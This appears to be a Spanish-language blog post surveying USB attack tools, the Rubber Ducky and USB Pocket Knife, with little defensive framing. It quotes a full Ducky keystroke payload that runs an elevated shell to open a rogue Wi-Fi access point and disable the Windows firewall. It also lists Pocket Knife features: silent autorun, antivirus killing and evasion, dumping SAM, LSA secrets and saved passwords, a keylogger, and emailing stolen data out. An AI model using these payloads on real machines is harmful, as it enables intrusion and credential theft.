USB hacking

El acceso físico a una máquina siempre puede suponer un problema de seguridad. No por el robo del equipo sino porque alguien de manera intencionada podría por ejemplo conectando un USB instalar un malware, o aprovechandose de una vulnerabilidad 0day del sistema operativo ejecutar código remoto y tener una shell  con permisos de administrador.
El artículo de hoy no trata sobre la explotación de una vulnrabilidad, sino de proyectos que tratan sobre “USB hacking”.
No creáis que estos USB son grandes.. y que se verán en seguida, los dispositivos que se usan para estas cosas son pequeños, y incluso tienen soporte para SD.

USB Rubber Ducky

Como veis el dispositivo es bastante pequeño y además tiene soporte para tarjeta SD.
¿Que proyectos existen?
El mas novedoso hasta la fecha es el de Rubber Ducky, podéis encontrar información sobre él en Code Google
El proyecto posee las siguientes características:

• Firmware to Support Windows, Linux, Mac OS X, Android & IOS
• Firmware to Support OSX only! (by demand)
• Firmware to Support Mass Storage (acts like USB Drive)
• Firmware to Support Multiple Payloads in HID mode
• New Firmware Composite Device; Mass Storage & Keyboard (Button triggers Keyboard) Language Independent
• New Feature Version 2 firmware supports easy VID & PID manipulation through binary file vidpid.bin.

Operating Systems Supported:

• Windows
• Unix (Linux,Solaris,BSD)
• OSX
• Android
• IOS

Multiple HID Language Support

• US (United States)
• UK (United Kingdom)
• DE (German)
• DA (Danish)
• FR (French)
• BE (Belgian)
• NO (Norwegian)
• PT (Portuguese)
• SV (Swedish)
• RU (Russian) (testing)

Script(s) to reverse Hak5 Ducky Binaries (inject.bin files) into their ducky script form.

• Currently Supports En-US and En-GB Languages

Además podremos crear distintos Payloads según nuestras necesidades. Tendremos una página que nos genera alguno de ellos.

Payloads Rubber Ducky

Para ver un ejemplo en Windows 7:

REM Author: Darren Kitchen
REM Target: Windows 7
REM Description: Create a Wireless AP and disable firewall.
DELAY 2000
CONTROL ESCAPE
DELAY 200
STRING cmd
DELAY 200
MENU
DELAY 100
STRING a
DELAY 100
LEFTARROW
ENTER
DELAY 200
STRING netsh wlan set hostednetwork mode=allow ssid=Seifreed key=CLAVE
ENTER
DELAY 100
STRING netsh wlan start hostednetwork
ENTER
DELAY 100
STRING netsh firewall set opmode disable
ENTER
STRING exit
ENTER

En este caso el usuario se conectaría al punto de acceso y el firewall quedaría deshabilitado.

QUACK

Puedes colaborar con tu propio PAYLOAD si quieres
Otro de los proyectos interesantes de USB Hacking es USB Pocket Knife
El proyecto es muy ambicioso y tiene muy buenas características, el detalle:

Key:
- Non-U3 Drives Only
- U3 Drives only
- Not yet Implemented
- Everything Else
Features:
- Upon insertion, the first option in the Autorun dialog box starts the payload, while appearing only to open the drive.
- Full silent autorun with no user interaction for U3 drives.
- A “Menu.bat” is included to mange all special functions, modules, and features of the switchblade.
- Payload checks the root of the C: drive and prevents the payload from running if the file “Safety.txt” is found.
- Includes TightVNC viewer so you always have it with you.
- Includes Notepad++ for easy batch editing.
- Includes antidote batch files for Nmap, the Hacksaw, and VNC.
- Fully commented code and fully featured ReadMe with instructions on setting up the payload for your needs.
- A custom backup and restore script, which automatically restores the switchblade (to the last time it was backed up) before every run. This ensures the payload is always put back to a normal state, even after it’s been nuked by an antivirus.
- A custom auto-update script that goes out and downloads the most recent versions of many of the tools used on the switchblade (pwdump, nircmd, etc). Simply run it from Menu.bat, and the tools will be downloaded, extracted, and installed into the payload. The backup archive for the entire payload will also be updated to keep the latest versions of the files from being overwritten by an old backup. *working on a way to get this working for U3 drives.
- Auto Compress logs as they are generated to save space
- Email logs Back to yourself
- Optional auto-repack of executable to circumvent AV detection
Payload Components:
- Runs AVKill (csrss.exe)
- Restores the payload to the last backup point
- Disables the Windows Firewall Silently
- Hides Hidden and System Files
- Enables the Remote Desktop service
- Dumps general System Info
- Dumps the SAM
- Dumps LSA secrets
- Dumps LSA secrets via an alternate method (less detectable, not as pretty)
- Dumps Network Passwords
- Dump messenger passwords
- Dump IE passwords.
- Dump saved wireless keys
- Dump URL history
- Dump Firefox passwords (Supports Firefox 3))
- Dump Cache Passwords
- Dump Current Network Services
- Generic Port Scanning
- Dumps current external IP
- Dumps email, messenger, and general website passwords
- Dumps currently installed hot fixes and IE history
- Dumps Google Chrome passwords
- Installs Hacksaw the usual way
- Installs WinVNC client.
- Installs Nmap as a service (emails you results like the Hacksaw)
- Installs a keylogger which emails its logs off to you daily [Broken!]
- File slurping for logs, chat-logs, downloads, bookmarks, etc. (smaller files)
- File slurping for various Documents and Media folders. (larger files)
- Opens an explorer window to the Documents folder when finished
- Automatic update scrip to keep various executables up to date.
- Compress logs as they are generated to save space.
- Optionally email logs in addition to storing them on the switchblade.
- Management interface to manage the various functions of the pocket Knife.
- Ability to save up to 3 configuration profiles [New!]

El USB hacking no es algo pasado de moda y con una buena suite instalada se pueden hacer estragos